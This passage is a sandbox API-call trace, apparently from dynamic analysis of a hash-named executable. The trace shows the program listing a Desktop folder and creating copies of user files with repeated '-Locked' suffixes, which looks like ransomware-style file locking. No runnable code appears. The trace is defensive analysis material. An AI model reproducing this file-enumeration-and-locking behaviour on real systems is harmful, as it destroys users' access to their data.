lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VL-8wX.png-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VL-8wX.png-Locked", lpFilePart=0x0) returned 0x2f [0305.147] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VL-8wX.png-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VL-8wX.png-Locked-Locked", lpFilePart=0x0) returned 0x36 [0305.147] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0305.147] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VL-8wX.png-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vl-8wx.png-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.148] GetFileType (hFile=0x49c) returned 0x1 [0305.148] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0305.148] GetFileType (hFile=0x49c) returned 0x1 [0305.150] CloseHandle (hObject=0x49c) returned 1 [0305.150] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WJV4 Vo51_-ctoxSde.gif-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WJV4 Vo51_-ctoxSde.gif-Locked", lpFilePart=0x0) returned 0x3b [0305.150] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WJV4 Vo51_-ctoxSde.gif-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WJV4 Vo51_-ctoxSde.gif-Locked-Locked", lpFilePart=0x0) returned 0x42 [0305.150] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0305.150] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WJV4 Vo51_-ctoxSde.gif-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\wjv4 vo51_-ctoxsde.gif-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.151] GetFileType (hFile=0x49c) returned 0x1 [0305.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0305.151] GetFileType (hFile=0x49c) returned 0x1 [0305.152] CloseHandle (hObject=0x49c) returned 1 [0305.153] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\y4hqqhoePb18-mRGw.pdf-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\y4hqqhoePb18-mRGw.pdf-Locked", lpFilePart=0x0) returned 0x3a [0305.153] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\y4hqqhoePb18-mRGw.pdf-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\y4hqqhoePb18-mRGw.pdf-Locked-Locked", lpFilePart=0x0) returned 0x41 [0305.153] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0305.153] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\y4hqqhoePb18-mRGw.pdf-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\y4hqqhoepb18-mrgw.pdf-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.154] GetFileType (hFile=0x49c) returned 0x1 [0305.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0305.154] GetFileType (hFile=0x49c) returned 0x1 [0305.155] CloseHandle (hObject=0x49c) returned 1 [0305.155] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af19c) returned 1 [0305.155] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x1aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0305.155] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x1aec78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e [0305.156] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*", lpFindFileData=0x1aeec4 | out: lpFindFileData=0x1aeec4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3630777f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36485145, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0305.156] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3630777f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36485145, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0305.156] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x346f313f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x346f313f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x346f313f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0aih45hu.jpg-Locked-Locked-Locked", cAlternateFileName="0AIH45~1.JPG")) returned 1 [0305.157] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35eba5f1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35eba5f1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35eba5f1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0aih45hu.jpg-Locked-Locked-Locked-Locked", cAlternateFileName="0AIH45~2.JPG")) returned 1 [0305.157] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34724090, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34724090, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34724090, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4-0bKIu_zvUdt.mkv-Locked-Locked-Locked", cAlternateFileName="4-0BKI~2.MKV")) returned 1 [0305.157] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35f01333, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35f01333, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35f01333, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked", cAlternateFileName="4-0BKI~1.MKV")) returned 1 [0305.157] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0d6f00, ftCreationTime.dwHighDateTime=0x1d8224f, ftLastAccessTime.dwLowDateTime=0x7ea60580, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xdac2100, ftLastWriteTime.dwHighDateTime=0x1d82242, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", cAlternateFileName="69811A~1.EXE")) returned 1 [0305.157] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327920f7, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327920f7, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35f1993c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", cAlternateFileName="69811A~2.EXE")) returned 1 [0305.158] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35f72b69, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35f72b69, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35f72b69, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked-Locked", cAlternateFileName="69811A~3.EXE")) returned 1 [0305.158] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327a0a8d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327a0a8d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327a0a8d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf-Locked", cAlternateFileName="AUTORU~1.INF")) returned 1 [0305.158] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35fa387f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35fa387f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35fa387f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf-Locked-Locked", cAlternateFileName="AUTORU~2.INF")) returned 1 [0305.158] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x32993524, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32993524, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj", cAlternateFileName="BGQH9X~1")) returned 1 [0305.159] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x326a0563, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x326a0563, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x326a0563, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj-Locked", cAlternateFileName="BGQH9X~2")) returned 1 [0305.159] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35fd6d70, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35fd6d70, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35fd6d70, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj-Locked-Locked", cAlternateFileName="BGQH9X~3")) returned 1 [0305.159] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327a9438, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327a9438, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327a9438, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc-Locked", cAlternateFileName="CSI0AP~2.DOC")) returned 1 [0305.159] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3602eacf, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3602eacf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3602eacf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc-Locked-Locked", cAlternateFileName="CSI0AP~1.DOC")) returned 1 [0305.159] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327b56d2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327b56d2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327b56d2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc-Locked", cAlternateFileName="CX4AG~1.DOC")) returned 1 [0305.160] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3608b7bf, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3608b7bf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3608b7bf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc-Locked-Locked", cAlternateFileName="CX4AG~2.DOC")) returned 1 [0305.160] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327c40db, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327c40db, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327c40db, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx-Locked", cAlternateFileName="D-A24D~2.XLS")) returned 1 [0305.161] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360ab2d2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x360ab2d2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x360ab2d2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx-Locked-Locked", cAlternateFileName="D-A24D~1.XLS")) returned 1 [0305.161] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327d17bd, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327d17bd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327d17bd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0305.161] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360bd8ae, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x360bd8ae, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x360bd8ae, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked-Locked", cAlternateFileName="DESKTO~2.INI")) returned 1 [0305.161] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327effc0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327effc0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327effc0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav-Locked", cAlternateFileName="G2JIFN~2.WAV")) returned 1 [0305.161] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360d10bf, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x360d10bf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x360d10bf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav-Locked-Locked", cAlternateFileName="G2JIFN~1.WAV")) returned 1 [0305.162] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327fc3a2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327fc3a2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327fc3a2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png-Locked", cAlternateFileName="HAXUSM~2.PNG")) returned 1 [0305.162] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36130501, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36130501, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36130501, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png-Locked-Locked", cAlternateFileName="HAXUSM~1.PNG")) returned 1 [0305.162] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3280deae, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3280deae, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3280deae, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp-Locked", cAlternateFileName="HELJNZ~1.BMP")) returned 1 [0305.162] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x361946b9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x361946b9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x361946b9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp-Locked-Locked", cAlternateFileName="HELJNZ~2.BMP")) returned 1 [0305.163] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32818f84, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32818f84, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32818f84, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi-Locked", cAlternateFileName="HHODZG~2.AVI")) returned 1 [0305.163] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3628d5d5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3628d5d5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3628d5d5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi-Locked-Locked", cAlternateFileName="HHODZG~1.AVI")) returned 1 [0305.163] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32825171, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32825171, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32825171, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi-Locked", cAlternateFileName="IWYHBO~2.AVI")) returned 1 [0305.163] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x362af9e1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x362af9e1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x362af9e1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi-Locked-Locked", cAlternateFileName="IWYHBO~1.AVI")) returned 1 [0305.163] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32830233, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32830233, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32830233, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a-Locked", cAlternateFileName="IZRQFJ~1.M4A")) returned 1 [0305.164] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x362cf450, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x362cf450, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x362cf450, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a-Locked-Locked", cAlternateFileName="IZRQFJ~2.M4A")) returned 1 [0305.164] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32841392, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32841392, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32841392, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx-Locked", cAlternateFileName="L0CW~2.DOC")) returned 1 [0305.164] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3630777f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3630777f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3630777f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx-Locked-Locked", cAlternateFileName="L0CW~1.DOC")) returned 1 [0305.164] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3284eac3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3284eac3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3284eac3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv-Locked", cAlternateFileName="L3CXAN~2.MKV")) returned 1 [0305.165] 